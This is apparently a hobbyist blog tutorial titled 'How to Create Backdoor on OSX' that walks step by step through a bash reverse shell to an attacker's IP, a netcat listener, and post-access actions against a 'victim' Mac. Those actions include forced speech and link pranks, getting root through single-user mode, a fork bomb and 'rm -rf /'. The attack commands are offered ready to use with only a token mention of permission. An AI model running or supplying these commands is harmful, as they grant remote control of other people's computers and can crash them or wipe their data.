How to Create Backdoor on OSX

Hello, ladies and gents! Today I will be discussing the fun and excitement of backdoor on an OSX system.

Note: A lot of what I am going to say is directly based off of this article by Patrick Mosca. Please give him your gratitude and leave mine at the door!

Step 1: Reverse Shell

A reverse shell is the first step to our backdoor on the OSX system.

The reverse shell will make it so our target computer tries to connect to us, before we connect to them.

We can create reverse shells with a simple 1 line code on our target system. (Yes sadly this has to be done on the target system.)

bash -i >& /dev/tcp/youripaddress/1337 0>&1

Fantastic! Your reverse shell has been created. If we want to gain root access, we can use our swiss army knife of penetrating testing tools, netcat.

On Kali Linux, type:

nc -l -p 1337

If you are using an OSX system for penetration testing (for some reason), type this:

nc -l 1337

If you did everything correctly, you should see a command line prompt similar to the following:

bash-3.2$

Step 2: Test Your Door

Let's make sure our backdoor has working hinges and a working doorknob. Don't think to hard about what I just said that was a joke.

Here are some fun things you can do with your backdoor:

1. Make the victim computer talk.

This is probably the most easy and funny trick in the book. Just type:

"say (Whatever you want the computer to say)"

If the volume is turned down on the victim computer, no words will be heard. To fix this, turn the volume all the way up!

" osascript -e 'set volume 7' "

2. Open links.

That's right. Remember that fantasy you had where you were a top notch hacker and you opened a thousand links of nyan cat on a government computer?

Well, you can do the same thing here, but instead of a government computer it would be a computer that you have permission to execute attacks on. (You evil little thing).

Simply type:

"open (link)"

Note: Your link MUST start with http://www . for this to work.

3. Navigate to directories

This one is probably going to be the most useful to know.

"ls" lists all of the files and folders contained in a directory.

"cd" opens a folder or directory.

4. Deadly commands

I will here talk briefly about some seriously, "do not try at home", commands.

I am not responsible for anything idiotic you do.

Note: Some if not most of these commands require root permissions. If you would like to be rooted backdoor accessible, than run this reverse shell command in single user mode. To launch in single user mode, start the victim computer whilst holding command s.

Fork Bomb:

A fork bomb is a process that will reduplicate itself infinitely until the computer crashes.

A fork bomb is made by typing:

:(){ :|:& };:

Note: I am not sure that this works on mac. Don't test it out, though. Seriously.

Erase EVERYTHING:

Okay no explanation needed:

rm -rf /

Step 3: Conclusion

Everyone run! The cyber revolution has taken over! Destroy the computers!

Just kidding.

The one main flaw in this attack is the fact that the target system has to execute a command first. So, there is a simple "patch".

1. Don't give your computer to strangers
2. Don't leave your computer out in the open
3. Don't run commands that you don't understand

I hope you enjoyed this tutorial! As always, leave any questions or disagreements in the comment section!

-- Cameron